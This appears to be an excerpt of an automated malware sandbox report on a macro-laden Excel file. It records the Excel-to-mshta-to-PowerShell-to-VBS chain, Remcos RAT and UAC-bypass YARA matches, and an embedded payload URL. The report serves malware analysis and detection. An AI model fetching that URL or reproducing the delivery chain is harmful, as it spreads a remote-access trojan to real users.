                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,30_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00401806 NtdllDefWindowProc_W,30_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004018C0 NtdllDefWindowProc_W,30_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004016FD NtdllDefWindowProc_A,31_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004017B7 NtdllDefWindowProc_A,31_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00402CAC NtdllDefWindowProc_A,33_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00402D66 NtdllDefWindowProc_A,33_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,35_2_004158B9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044B04030_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0043610D30_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044731030_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044A49030_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040755A30_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0043C56030_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044B61030_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044D6C030_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004476F030_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044B87030_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044081D30_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041495730_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004079EE30_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00407AEB30_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044AA8030_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00412AA930_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00404B7430_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00404B0330_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044BBD830_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00404BE530_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00404C7630_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00415CFE30_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00416D7230_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00446D3030_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00446D8B30_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00406E8F30_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040503831_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0041208C31_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004050A931_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040511A31_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0043C13A31_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004051AB31_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044930031_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040D32231_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044A4F031_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0043A5AB31_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0041363131_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044669031_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044A73031_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004398D831_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004498E031_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044A88631_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0043DA0931_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00438D5E31_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00449ED031_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0041FE8331_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00430F5431_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_004050C233_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_004014AB33_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_0040513333_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_004051A433_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_0040124633_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_0040CA4633_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_0040523533_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_004032C833_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_0040168933_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00402F6033_2_00402F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0041D07135_2_0041D071
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004520D235_2_004520D2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043D09835_2_0043D098
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043715035_2_00437150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004361AA35_2_004361AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0042625435_2_00426254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043137735_2_00431377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043651C35_2_0043651C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0041E5DF35_2_0041E5DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0044C73935_2_0044C739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004367C635_2_004367C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004267CB35_2_004267CB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043C9DD35_2_0043C9DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00432A4935_2_00432A49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00436A8D35_2_00436A8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043CC0C35_2_0043CC0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00436D4835_2_00436D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00434D2235_2_00434D22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00426E7335_2_00426E73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00440E2035_2_00440E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043CE3B35_2_0043CE3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00412F4535_2_00412F45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00452F0035_2_00452F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00426FAD35_2_00426FAD
                  Source: OC25-11-24.xlsOLE indicator, VBA macros: true
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drOLE indicator, VBA macros: true
                  Source: OC25-11-24.xlsStream path 'MBd00033108/\x1Ole' : https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout4f!VD>Uc2j_),bHiO|DMw=W8E {^h*DYogPx$MQ{-4EBw\Sy'@(OhL/5CHH 21rLuUs\N>[*7t*g>YPkwQJ0ZnC57VntnxBvghfkXyFpqEFZ1xYYkHJlgdmjJDFmCZkORTX8YnHBr3RT5PYTerZs2D6FSKP0tYHV2tfonXl6vB5kQqyZAaTwqE1P8sRr,{V^vR6.<
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drStream path 'MBd00033108/\x1Ole' : https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout4f!VD>Uc2j_),bHiO|DMw=W8E {^h*DYogPx$MQ{-4EBw\Sy'@(OhL/5CHH 21rLuUs\N>[*7t*g>YPkwQJ0ZnC57VntnxBvghfkXyFpqEFZ1xYYkHJlgdmjJDFmCZkORTX8YnHBr3RT5PYTerZs2D6FSKP0tYHV2tfonXl6vB5kQqyZAaTwqE1P8sRr,{V^vR6.<
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 39 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2073
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2446
                  Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2073
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2446
                  Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2073Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2446Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2073Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2446
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: powershell.exe PID: 2116, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3964, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhvD598.tmp.30.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@45/43@16/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,30_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,33_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,35_2_00416AB7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,30_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,30_2_00413D4C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,30_2_0040B58D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,35_2_00419BC4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-H42H13
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR84E7.tmpJump to behavior
                  Source: OC25-11-24.xlsOLE indicator, Workbook stream: true
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drOLE indicator, Workbook stream: true
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m.....p.......................p.......x........................3......................p...............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+..............P................m.......m.....}..w.............................1......(.P..............3........+..............O..............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................ .......Uk....}..w.....O......\.......................(.P....................... .............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+......................................O......}..w............ 'e.....8.Uk......d.....(.P.......................+.............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................ .......Uk....}..w.....O......\.......................(.P....................... .............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+......................................O......}..w............ 'e.....8.Uk......d.....(.P.......................+.............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n....... .....N.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1. 'e.....8.Uk......d.....(.P....................... ..... .......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.V.I.C.e.c.R.E.D.E.n.t.I.A.l.D.E.p.l.O.y.m.E.N.T...e.x.E................... .....@.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................... .....@.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+......................................O......}..w............ 'e.....8.Uk......d.....(.P.......................+.............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..... .....N.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..+......................................O......}..w............ 'e.....8.Uk......d.....(.P.......................+.....l.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........O......}..w............ 'e.....8.Uk......d.....(.P....................... .............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......8...............@...............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................8...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m......9.......................9.......9.......................3......x................9..............
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................x...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................I.l....}..w............\.......................(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............. L.....-I.l....P.K.....(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................I.l....}..w............\.......................(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............. L.....-I.l....P.K.....(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.. L.....-I.l....P.K.....(.P............................. .......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.V.I.C.e.c.R.E.D.E.n.t.I.A.l.D.E.p.l.O.y.m.E.N.T...e.x.E.........................@.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............. L.....-I.l....P.K.....(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............. L.....-I.l....P.K.....(.P.............................l.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............. L.....-I.l....P.K.....(.P.....................................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......x...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.............$.......x...............................
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
